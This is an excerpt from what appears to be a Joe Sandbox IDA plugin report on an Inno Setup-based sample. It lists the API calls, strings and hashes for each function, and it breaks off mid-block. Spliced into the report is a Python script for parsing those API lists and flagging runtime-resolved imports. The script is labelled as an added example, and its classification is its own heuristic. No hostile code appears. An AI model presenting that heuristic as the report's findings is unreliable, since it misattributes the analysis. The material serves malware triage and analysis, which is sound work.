                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorLibraryLoadModeProc
                                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                              • API String ID: 2492108670-2683653824
                                                                              • Opcode ID: 86cf81fee744bb21f40f36152ca0a59654e50c5ee39d1ae44c17eff86845b0ac
                                                                              • Instruction ID: d379c4162c5a45317e257a8b9368072ef34678a45322f04a033aff34d3fd6743
                                                                              • Opcode Fuzzy Hash: 86cf81fee744bb21f40f36152ca0a59654e50c5ee39d1ae44c17eff86845b0ac
                                                                              • Instruction Fuzzy Hash: 4BB092A06027018ADB00F7F258A662B28099B40319B20803B71889B685EE3C88004BAF
                                                                              APIs
                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID:
                                                                              • API String ID: 2574300362-0
                                                                              • Opcode ID: c059e024c9e6eb8416f72924d9350c7e8f021855cc9b01300ad62ba4517ae118
                                                                              • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                              • Opcode Fuzzy Hash: c059e024c9e6eb8416f72924d9350c7e8f021855cc9b01300ad62ba4517ae118
                                                                              • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
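Reading these "APIs" lists by hand is slow, and what an analyst usually wants from them is a single view of which exports the sample resolves at runtime: the GetModuleHandleA/LoadLibraryA followed by GetProcAddress pattern that recurs in the blocks above, plus the sites where GetProcAddress is called with a name that is not a literal string (shown as 00000000, ? or a stack leftover such as a DLL name), which is what the LoadLibraryExA/GetProcAddress pair at 0044864C/004486CD looks like. The Python script below is an added example and is not part of the Joe Sandbox report or its IDA plugin. It parses lines in the exact format printed here (`Function.MODULE(args), ref: address`, with the optional "Part of subcall function" prefix); the embedded sample lines are copied from the function blocks on this page, and the classification of an argument as "export name" versus "runtime-computed" is the example's own heuristic, not something the report states.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: API lines in the format used by the report's "APIs" lists,
# copied from the function blocks above (bullet, optional caller, Function.MODULE(args), ref).
SAMPLE_API_LINES = """\
• Part of subcall function 00483560: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483571
• Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048357E
• Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483594
• Part of subcall function 00483560: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004835D4
• Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004835DA
• Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00483B5B
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
"""

# One API line: optional bullet, optional caller prefix, Function.MODULE(args), ref: address
_LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX_WORD_RE = re.compile(r"[0-9A-Fa-f]{8}")
_EXPORT_RE = re.compile(r"[A-Za-z_]\w*")

# Loader calls whose first argument, when it is a literal, names the module being opened.
LOADER_FUNCS = {"GetModuleHandleA", "GetModuleHandleW",
                "LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def parse_api_line(line: str) -> Optional[Dict]:
    """Parse one 'APIs' line; returns None for headings and other non-API lines."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    raw_args = m.group("args").strip()
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    return {
        "caller": m.group("caller"),
        "func": m.group("func"),
        "module": m.group("module").upper(),
        "args": args,
        "ref": m.group("ref").upper(),
    }


def looks_like_export_name(arg: str) -> bool:
    """True when the plugin printed a literal export name (IsWow64Process).
    Hex words (00000000), '?' and stack leftovers such as 'advapi32.dll' are not names."""
    return bool(_EXPORT_RE.fullmatch(arg)) and not _HEX_WORD_RE.fullmatch(arg)


def summarize(lines: List[str]) -> Dict:
    """Collect runtime-resolved imports, opaque GetProcAddress sites and modules touched."""
    resolved: Dict[str, str] = {}      # export name -> address of the resolving call
    unresolved_sites: List[str] = []   # GetProcAddress calls whose name is computed at runtime
    modules = set()
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        if call["func"] == "GetProcAddress":
            name = call["args"][1] if len(call["args"]) > 1 else ""
            if looks_like_export_name(name):
                resolved.setdefault(name, call["ref"])
            else:
                unresolved_sites.append(call["ref"])
        elif call["func"] in LOADER_FUNCS and call["args"]:
            first = call["args"][0]
            if first.lower().endswith(".dll"):
                modules.add(first.lower())
    return {"resolved": resolved, "unresolved_sites": unresolved_sites, "modules": modules}


if __name__ == "__main__":
    summary = summarize(SAMPLE_API_LINES.splitlines())
    print("modules touched:", sorted(summary["modules"]))
    for name, ref in sorted(summary["resolved"].items()):
        print(f"  resolved {name:<24} at {ref}")
    print("GetProcAddress sites with a runtime-computed name:", summary["unresolved_sites"])
```

Feed it the full "APIs" lists of a report (one line per entry) to get the same three views for the whole binary; the unresolved sites are the ones worth opening in the disassembler, since a name that is not a literal string is either decrypted or hashed before the lookup.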
                                                                              APIs
                                                                              • GetSystemMenu.USER32(00000000,00000000,00000000,00481898), ref: 00481830
                                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481841
                                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481859
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Append$System
                                                                              • String ID:
                                                                              • API String ID: 1489644407-0
                                                                              • Opcode ID: d933746ff7b66401e606975732ccc260a02719cdd81df1f2e9532199b1c22675
                                                                              • Instruction ID: 2579a7d5db53e33ee4863251c1290a2b13440539eb68b17f0e677d1311332c65
                                                                              • Opcode Fuzzy Hash: d933746ff7b66401e606975732ccc260a02719cdd81df1f2e9532199b1c22675
                                                                              • Instruction Fuzzy Hash: A131A3307043445AD721BB769C83B6E3B989F55718F54587FF8009A2E3CA7C9D0A879D
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0044B401
                                                                              • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectReleaseSelect
                                                                              • String ID:
                                                                              • API String ID: 1831053106-0
                                                                              • Opcode ID: 71686dd1bf2aceb477ce3f8db4b541325f82ff5bc32dc74031120fde16d0cea8
                                                                              • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                              • Opcode Fuzzy Hash: 71686dd1bf2aceb477ce3f8db4b541325f82ff5bc32dc74031120fde16d0cea8
                                                                              • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,004820C7,?,?), ref: 0044B11E
                                                                              • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                              • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DrawText$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 65125430-0
                                                                              • Opcode ID: 48900d8d8fc19135f8d19aada3e9e9d8d34cb92564939e70bb5bc2663f887e99
                                                                              • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                              • Opcode Fuzzy Hash: 48900d8d8fc19135f8d19aada3e9e9d8d34cb92564939e70bb5bc2663f887e99
                                                                              • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                              APIs
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                              • TranslateMessage.USER32(?), ref: 0042448F
                                                                              • DispatchMessageA.USER32(?), ref: 00424499
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 4217535847-0
                                                                              • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                              • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                              • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                              • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                              APIs
                                                                              • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                              • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Prop$Window
                                                                              • String ID:
                                                                              • API String ID: 3363284559-0
                                                                              • Opcode ID: ff8df5d04f2ecdb5f17762fdbd8b59dc717163ef82ea70d213bab306533cf9bb
                                                                              • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                              • Opcode Fuzzy Hash: ff8df5d04f2ecdb5f17762fdbd8b59dc717163ef82ea70d213bab306533cf9bb
                                                                              • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                              • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                              • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableEnabledVisible
                                                                              • String ID:
                                                                              • API String ID: 3234591441-0
                                                                              • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                              • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                              • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                              • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?), ref: 00469EA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID: PrepareToInstall
                                                                              • API String ID: 2558294473-1101760603
                                                                              • Opcode ID: e58a16817a64f5759f31888600c1354bb1a8a8b494c3c93af2f1dbc242ca25c6
                                                                              • Instruction ID: ccacc6dcba8b8cbbfa1c17f86b27e08b0c11e5798d11daccd90c331c988b02c3
                                                                              • Opcode Fuzzy Hash: e58a16817a64f5759f31888600c1354bb1a8a8b494c3c93af2f1dbc242ca25c6
                                                                              • Instruction Fuzzy Hash: 7EA11934A00109DFCB00EF59D986EDEB7F5AF48304F6580B6E404AB366D778AE41DB99
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /:*?"<>|
                                                                              • API String ID: 0-4078764451
                                                                              • Opcode ID: 43277fb1c717e2606564b112b1b0681d416f5021830c97b09ce096e65d7cf365
                                                                              • Instruction ID: 1e87f3d38ec7dbf16fc1afa4daea9e6ca85b65b9a8fb7c68475855461939e3a0
                                                                              • Opcode Fuzzy Hash: 43277fb1c717e2606564b112b1b0681d416f5021830c97b09ce096e65d7cf365
                                                                              • Instruction Fuzzy Hash: 4371A470A40214ABDB10EB66DDD2BEE77A19F40308F1084A7F580AB392E779AD45875F
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?), ref: 0048215A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID: InitializeWizard
                                                                              • API String ID: 2558294473-2356795471
                                                                              • Opcode ID: 376233a1d1dddbf1dd43b25fae561af2bf40b6633c4dd7a0e8b1389a7c4343be
                                                                              • Instruction ID: 36b0f45b5e581da985bac651985c8aaa8d6a9bed6a39233588f506be3a995c8b
                                                                              • Opcode Fuzzy Hash: 376233a1d1dddbf1dd43b25fae561af2bf40b6633c4dd7a0e8b1389a7c4343be
                                                                              • Instruction Fuzzy Hash: 79119434205200AFD701FBA9EEDAB1937E4EB59328F60047BF5009B6A1DA796C00CB5D
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C230,00000000,0047C432), ref: 0047C029
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BFF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                              • API String ID: 47109696-1019749484
                                                                              • Opcode ID: 91d5c32787d00ddb3ecc29a404e36154aacf37a6ecdb6076e024b20848598476
                                                                              • Instruction ID: 5930872802659161668f2fc27ec2b8a5c579264ce8ecaca434dd7baa373bea44
                                                                              • Opcode Fuzzy Hash: 91d5c32787d00ddb3ecc29a404e36154aacf37a6ecdb6076e024b20848598476
                                                                              • Instruction Fuzzy Hash: B1F08231700514A7DA00A69E6D82B9BA79D9B84758F20403FF508DB242DABE9E0202EC
                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,00475FFE,?,0049C1DC,?,0046EFCF,?,00000000,0046F56A,?,_is1), ref: 0046ECDB
                                                                              Strings
                                                                              • Inno Setup: Setup Version, xrefs: 0046ECD9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: Inno Setup: Setup Version
                                                                              • API String ID: 3702945584-4166306022
                                                                              • Opcode ID: 56bbb1f4a6cd77c20b542710a526df67742b244f3cd53e0af7fea37619b23a66
                                                                              • Instruction ID: 3111e2ab1a00cbee8849f506c2bc3fe53732bb3e30b7299e44938699edfd3f7c
                                                                              • Opcode Fuzzy Hash: 56bbb1f4a6cd77c20b542710a526df67742b244f3cd53e0af7fea37619b23a66
                                                                              • Instruction Fuzzy Hash: 71E06D753012043FE710AA2B9C85F5BBBDCDF99765F10403AB909DB392D978DD0085A8
                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F3A6,?,?,00000000,0046F56A,?,_is1,?), ref: 0046ED3B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: NoModify
                                                                              • API String ID: 3702945584-1699962838
                                                                              • Opcode ID: 306e8526e04bb1da42350282118940b5300f429dbb2620f70078b8bfc6bd1a7c
                                                                              • Instruction ID: e7aa99f2e089c5623e338f59092b711216c244eb116ac0446a77828d65f342ac
                                                                              • Opcode Fuzzy Hash: 306e8526e04bb1da42350282118940b5300f429dbb2620f70078b8bfc6bd1a7c
                                                                              • Instruction Fuzzy Hash: 3AE04FB4640304BFEB04DB55CD4AF6B77ECDB48710F104059BA049B291E674FE00CA68
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              Strings
                                                                              • System\CurrentControlSet\Control\Windows, xrefs: 0042DE36
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID: System\CurrentControlSet\Control\Windows
                                                                              • API String ID: 71445658-1109719901
                                                                              • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                              • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                              • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                              • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                              APIs
                                                                              • GetACP.KERNEL32(?,?,00000001,00000000,0047E237,?,-0000001A,004800ED,-00000010,?,00000004,0000001B,00000000,0048043A,?,0045D9B8), ref: 0047DFCE
                                                                                • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004804A1,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                              • SendNotifyMessageA.USER32(0002042A,00000496,00002711,-00000001), ref: 0047E19E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: EnumFontsMessageNotifyReleaseSend
                                                                              • String ID:
